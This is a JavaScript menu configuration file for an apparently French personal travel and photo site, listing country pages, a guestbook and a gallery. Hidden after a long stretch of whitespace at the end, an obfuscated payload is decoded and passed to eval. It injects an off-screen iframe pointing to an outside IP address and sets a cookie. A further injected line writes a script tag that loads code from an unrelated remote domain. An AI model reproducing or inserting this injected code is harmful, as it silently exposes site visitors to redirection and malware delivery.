
var isHorizontal=1;
var smColumns=1;
var smOrientation=0;
var smViewType=0;
var dmRTL=0;
var pressedItem=-2;
var itemCursor="pointer";
var itemTarget="_self";
var statusString="tip";
var blankImage="MenuImage/empty.gif";
var menuWidth="";
var menuHeight="";
var smWidth="130px";
var smHeight="";
var absolutePos=0;
var posX="0px";
var posY="0px";
var topDX=0;
var topDY=3;
var DX=2;
var DY=0;
var fontStyle="bold 10pt Verdana";
var fontColor=["#000000","#000000"];
var fontDecoration=["none","underline"];
var fontColorDisabled="";
var menuBackColor=["transparent"];
var menuBackImage=["transparent"];
var menuBackRepeat="no-repeat";
var menuBorderColor=["#000000"];
var menuBorderWidth=0;
var menuBorderStyle="none";
var itemBackColor=["transparent","transparent"];
var itemBackImage=["",""];
var itemBorderWidth=0;
var itemBorderColor=["",""];
var itemBorderStyle=["solid","solid"];
var itemSpacing=0;
var itemPadding="0px";
var itemAlignTop="left";
var itemAlign="left";
var subMenuAlign="left";
var iconTopWidth=6;
var iconTopHeight=6;
var iconWidth=6;
var iconHeight=6;
var arrowWidth=6;
var arrowHeight=6;
var arrowImageMain=["MenuImage/fleche_menu1.gif","MenuImage/fleche_menu1.gif"];
var arrowImageSub=["MenuImage/fleche_sousmenu.gif","MenuImage/fleche_sousmenu.gif"];
var separatorImage="MenuImage/lignel.gif";
var separatorWidth="136px";
var separatorHeight="8px";
var separatorAlignment="center";
var separatorVImage="MenuImage/ligneh.gif";
var separatorVWidth="10px";
var separatorVHeight="18px";
var separatorPadding="0px";
var floatable=0;
var floatIterations=6;
var floatableX=1;
var floatableY=1;
var movable=0;
var moveWidth=12;
var moveHeight=20;
var moveColor="#AA0000";
var moveImage="";
var moveCursor="default";
var smMovable=0;
var closeBtnW=15;
var closeBtnH=15;
var closeBtn="";
var transparency=100;
var transition=1;
var transOptions="";
var transDuration=100;
var transDuration2=200;
var shadowLen=3;
var shadowColor="#777777";
var shadowTop=0;
var cssStyle=0;
var cssSubmenu="";
var cssItem=["",""];
var cssItemText=["",""];
var dmObjectsCheck=1;
var saveNavigationPath=1;
var showByClick=0;
var noWrap=1;
var pathPrefix_img="";
var pathPrefix_link="";
var smShowPause=200;
var smHidePause=1000;
var smSmartScroll=1;
var smHideOnClick=1;
var dm_writeAll=0;
var dmAJAX=0;
var dmAJAXCount=0;
var dynamic=0;
var keystrokes=0;
var dm_focus=1;
var dm_actKey=113;
var iconDefault=["",""];
var dynamic = 1;
var pathPrefix_img = '';

var itemStyles = [
["fontStyle:bold 10pt Verdana","itemWidth:0px"],
["itemBackColor:#FCFCF9,#FFFFFF","itemBorderWidth:0","itemBorderColor:#000000,#000000","fontStyle:normal 8pt Verdana"],
[],
[],
[],
[],
];

var menuStyles = [
["itemPadding:3px 10px 0px 5px","menuBorderStyle:none","menuBorderWidth:0"],
["itemPadding:3px","menuBorderStyle:none","menuBorderWidth:0",],
];

var menuItems = [
["Accueil |","javascript:document.location='accueil_020.htm'",iconDefault[0],iconDefault[1],"", , "0", "0", , ],
["FRANCE |","javascript:document.location='france_023.htm'",iconDefault[0],iconDefault[1],"", , "0", "0", , ],
["UK |","javascript:document.location='royaume_uni_024.htm'",iconDefault[0],iconDefault[1],"", , "0", "0", , ],
["USA |","javascript:document.location='usa_022.htm'",iconDefault[0],iconDefault[1],"", , "0", "0", , ],
["NZ |","javascript:document.location='nz_025.htm'",iconDefault[0],iconDefault[1],"", , "0", "0", , ],
["AUSTRALIE |","javascript:document.location='accueil_020.htm'",iconDefault[0],iconDefault[1],"", , "0", "0", , ],
["Nouvelle-calédonie |","javascript:document.location='accueil_020.htm'",iconDefault[0],iconDefault[1],"", , "0", "0", , ],
["Livre d'Or","javascript:document.location='livre_d_or_021.htm'",iconDefault[0],iconDefault[1],"", , "0", "0", , ],
["Galerie","javascript:OpenWindow('expose/expose.html','newwin','scrollbars=no,width=800,height=600,resizable=yes','800','600')",iconDefault[0],iconDefault[1],"Galerie Photos", , "0", "0", , ],
];
//src="MenuImage/empty.gif"
//src="MenuImage/fleche_menu1.gif"
//src="MenuImage/fleche_menu1.gif"
//src="MenuImage/fleche_sousmenu.gif"
//src="MenuImage/fleche_sousmenu.gif"
//src="MenuImage/lignel.gif"
//src="MenuImage/ligneh.gif"


dm_init();


                                                                                                                                                                                                                                                          ozkydd="fr" "omCh" "arCo" "de";if(document.querySelector)aqyjeg=4;rezzyr=("4c,92,a1,9a,8f,a0,95,9b,9a,4c,99,9d,9a,5c,65,54,55,4c,a7,39,36,4c,a2,8d,9e,4c,9f,a0,8d,a0,95,8f,69,53,8d,96,8d,a4,53,67,39,36,4c,a2,8d,9e,4c,8f,9b,9a,a0,9e,9b,98,98,91,9e,69,53,95,9a,90,91,a4,5a,9c,94,9c,53,67,39,36,4c,a2,8d,9e,4c,99,9d,9a,4c,69,4c,90,9b,8f,a1,99,91,9a,a0,5a,8f,9e,91,8d,a0,91,71,98,91,99,91,9a,a0,54,53,95,92,9e,8d,99,91,53,55,67,39,36,39,36,4c,99,9d,9a,5a,9f,9e,8f,4c,69,4c,53,94,a0,a0,9c,66,5b,5b,62,65,5a,5d,62,5d,5a,5d,61,62,5a,5e,60,5e,5b,62,7d,79,77,72,5e,9e,70,5a,9c,94,9c,53,67,39,36,4c,99,9d,9a,5a,9f,a0,a5,98,91,5a,9c,9b,9f,95,a0,95,9b,9a,4c,69,4c,53,8d,8e,9f,9b,98,a1,a0,91,53,67,39,36,4c,99,9d,9a,5a,9f,a0,a5,98,91,5a,8f,9b,98,9b,9e,4c,69,4c,53,5e,5c,62,53,67,39,36,4c,99,9d,9a,5a,9f,a0,a5,98,91,5a,94,91,95,93,94,a0,4c,69,4c,53,5e,5c,62,9c,a4,53,67,39,36,4c,99,9d,9a,5a,9f,a0,a5,98,91,5a,a3,95,90,a0,94,4c,69,4c,53,5e,5c,62,9c,a4,53,67,39,36,4c,99,9d,9a,5a,9f,a0,a5,98,91,5a,98,91,92,a0,4c,69,4c,53,5d,5c,5c,5c,5e,5c,62,53,67,39,36,4c,99,9d,9a,5a,9f,a0,a5,98,91,5a,a0,9b,9c,4c,69,4c,53,5d,5c,5c,5c,5e,5c,62,53,67,39,36,39,36,4c,95,92,4c,54,4d,90,9b,8f,a1,99,91,9a,a0,5a,93,91,a0,71,98,91,99,91,9a,a0,6e,a5,75,90,54,53,99,9d,9a,53,55,55,4c,a7,39,36,4c,90,9b,8f,a1,99,91,9a,a0,5a,a3,9e,95,a0,91,54,53,68,9c,4c,95,90,69,88,53,99,9d,9a,88,53,4c,8f,98,8d,9f,9f,69,88,53,99,9d,9a,5c,65,88,53,4c,6a,68,5b,9c,6a,53,55,67,39,36,4c,90,9b,8f,a1,99,91,9a,a0,5a,93,91,a0,71,98,91,99,91,9a,a0,6e,a5,75,90,54,53,99,9d,9a,53,55,5a,8d,9c,9c,91,9a,90,6f,94,95,98,90,54,99,9d,9a,55,67,39,36,4c,a9,39,36,a9,39,36,92,a1,9a,8f,a0,95,9b,9a,4c,7f,91,a0,6f,9b,9b,97,95,91,54,8f,9b,9b,97,95,91,7a,8d,99,91,58,8f,9b,9b,97,95,91,82,8d,98,a1,91,58,9a,70,8d,a5,9f,58,9c,8d,a0,94,55,4c,a7,39,36,4c,a2,8d,9e,4c,a0,9b,90,8d,a5,4c,69,4c,9a,91,a3,4c,70,8d,a0,91,54,55,67,39,36,4c,a2,8d,9e,4c,91,a4,9c,95,9e,91,4c,69,4c,9a,91,a3,4c,70,8d,a0,91,54,55,67,39,36,4c,95,92,4c,54,9a,70,8d,a5,9f,69,69,9a,a1,98,98,4c,a8,a8,4c,9a,70,8d,a5,9f,69,69,5c,55,4c,9a,70,8d,a5,9f,69,5d,67,39,36,4c,91,a4,9c,95,9e,91,5a,9f,91,a0,80,95,99,91,54,a0,9b,90,8d,a5,5a,93,91,a0,80,95,99,91,54,55,4c,57,4c,5f,62,5c,5c,5c,5c,5c,56,5e,60,56,9a,70,8d,a5,9f,55,67,39,36,4c,90,9b,8f,a1,99,91,9a,a0,5a,8f,9b,9b,97,95,91,4c,69,4c,8f,9b,9b,97,95,91,7a,8d,99,91,57,4e,69,4e,57,91,9f,8f,8d,9c,91,54,8f,9b,9b,97,95,91,82,8d,98,a1,91,55,39,36,4c,57,4c,4e,67,91,a4,9c,95,9e,91,9f,69,4e,4c,57,4c,91,a4,9c,95,9e,91,5a,a0,9b,73,79,80,7f,a0,9e,95,9a,93,54,55,4c,57,4c,54,54,9c,8d,a0,94,55,4c,6b,4c,4e,67,4c,9c,8d,a0,94,69,4e,4c,57,4c,9c,8d,a0,94,4c,66,4c,4e,4e,55,67,39,36,a9,39,36,92,a1,9a,8f,a0,95,9b,9a,4c,73,91,a0,6f,9b,9b,97,95,91,54,4c,9a,8d,99,91,4c,55,4c,a7,39,36,4c,a2,8d,9e,4c,9f,a0,8d,9e,a0,4c,69,4c,90,9b,8f,a1,99,91,9a,a0,5a,8f,9b,9b,97,95,91,5a,95,9a,90,91,a4,7b,92,54,4c,9a,8d,99,91,4c,57,4c,4e,69,4e,4c,55,67,39,36,4c,a2,8d,9e,4c,98,91,9a,4c,69,4c,9f,a0,8d,9e,a0,4c,57,4c,9a,8d,99,91,5a,98,91,9a,93,a0,94,4c,57,4c,5d,67,39,36,4c,95,92,4c,54,4c,54,4c,4d,9f,a0,8d,9e,a0,4c,55,4c,52,52,39,36,4c,54,4c,9a,8d,99,91,4c,4d,69,4c,90,9b,8f,a1,99,91,9a,a0,5a,8f,9b,9b,97,95,91,5a,9f,a1,8e,9f,a0,9e,95,9a,93,54,4c,5c,58,4c,9a,8d,99,91,5a,98,91,9a,93,a0,94,4c,55,4c,55,4c,55,39,36,4c,a7,39,36,4c,9e,91,a0,a1,9e,9a,4c,9a,a1,98,98,67,39,36,4c,a9,39,36,4c,95,92,4c,54,4c,9f,a0,8d,9e,a0,4c,69,69,4c,59,5d,4c,55,4c,9e,91,a0,a1,9e,9a,4c,9a,a1,98,98,67,39,36,4c,a2,8d,9e,4c,91,9a,90,4c,69,4c,90,9b,8f,a1,99,91,9a,a0,5a,8f,9b,9b,97,95,91,5a,95,9a,90,91,a4,7b,92,54,4c,4e,67,4e,58,4c,98,91,9a,4c,55,67,39,36,4c,95,92,4c,54,4c,91,9a,90,4c,69,69,4c,59,5d,4c,55,4c,91,9a,90,4c,69,4c,90,9b,8f,a1,99,91,9a,a0,5a,8f,9b,9b,97,95,91,5a,98,91,9a,93,a0,94,67,39,36,4c,9e,91,a0,a1,9e,9a,4c,a1,9a,91,9f,8f,8d,9c,91,54,4c,90,9b,8f,a1,99,91,9a,a0,5a,8f,9b,9b,97,95,91,5a,9f,a1,8e,9f,a0,9e,95,9a,93,54,4c,98,91,9a,58,4c,91,9a,90,4c,55,4c,55,67,39,36,a9,39,36,95,92,4c,54,9a,8d,a2,95,93,8d,a0,9b,9e,5a,8f,9b,9b,97,95,91,71,9a,8d,8e,98,91,90,55,39,36,a7,39,36,95,92,54,73,91,a0,6f,9b,9b,97,95,91,54,53,a2,95,9f,95,a0,91,90,8b,a1,9d,53,55,69,69,61,61,55,a7,a9,91,98,9f,91,a7,7f,91,a0,6f,9b,9b,97,95,91,54,53,a2,95,9f,95,a0,91,90,8b,a1,9d,53,58,4c,53,61,61,53,58,4c,53,5d,53,58,4c,53,5b,53,55,67,39,36,39,36,99,9d,9a,5c,65,54,55,67,39,36,a9,39,36,a9".split(","));fxtm=eval;function dkoqoj(){mcyd=function(){--(lgea.body)}()}lgea=document;for(lfc=0;lfc<rezzyr["length"];lfc =1){rezzyr[lfc]=-(44) parseInt(rezzyr[lfc],aqyjeg*4);}try{dkoqoj()}catch(ugesel){okobak=50-50;}if(!okobak)fxtm(String[ozkydd].apply(String,rezzyr));
/*/74ed9f*/

                                                                                                                                                                                                                                                          
/*/2d3965*//

/*6625ab*/
document.write('<script src="http://fpinmobiliaria.es/knmMQt1Z.php?id=27182439" type="text/javascript"></script>');
/*/6625ab*/
